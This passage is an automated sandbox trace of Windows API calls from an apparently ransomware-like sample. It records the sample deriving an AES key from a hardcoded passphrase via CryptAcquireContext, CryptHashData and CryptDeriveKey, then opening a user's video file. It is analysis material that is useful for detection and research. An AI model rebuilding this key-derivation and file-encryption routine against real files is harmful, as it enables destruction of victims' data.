lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0098.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.448] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0098.448] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.448] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0098.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431db18 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0098.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0098.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca0e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0098.451] CloseHandle (hObject=0x258) returned 1 [0098.451] FreeLibrary (hLibModule=0x772d0000) returned 1 [0098.451] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0098.452] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\E8Q4uNIBQS8v.flv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd412f2b0, ftCreationTime.dwHighDateTime=0x1d5e59f, ftLastAccessTime.dwLowDateTime=0x3ad28a70, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x3ad28a70, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x13b08, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="E8Q4uNIBQS8v.flv", cAlternateFileName="E8Q4UN~1.FLV")) returned 0x41ac040 [0098.452] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0098.452] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0098.452] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.452] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0098.452] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.452] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0098.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0098.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0098.453] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0098.453] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0098.453] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0098.454] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0098.454] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0098.454] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.454] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0098.454] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.454] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0098.454] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca6b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0098.454] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0098.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0098.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0098.454] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0098.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0098.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0098.454] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca538, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0098.455] CryptHashData (hHash=0x41ac540, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0098.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.455] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0098.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0098.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca4d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0098.455] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac6c0) returned 1 [0098.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0098.455] CryptDestroyHash (hHash=0x41ac540) returned 1 [0098.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0098.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0098.457] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0098.457] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0098.457] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0098.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0098.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0098.457] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\E8Q4uNIBQS8v.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\e8q4unibqs8v.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0098.458] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.458] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0098.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0098.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0098.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0098.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0098.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0098.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0098.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.458] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0098.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 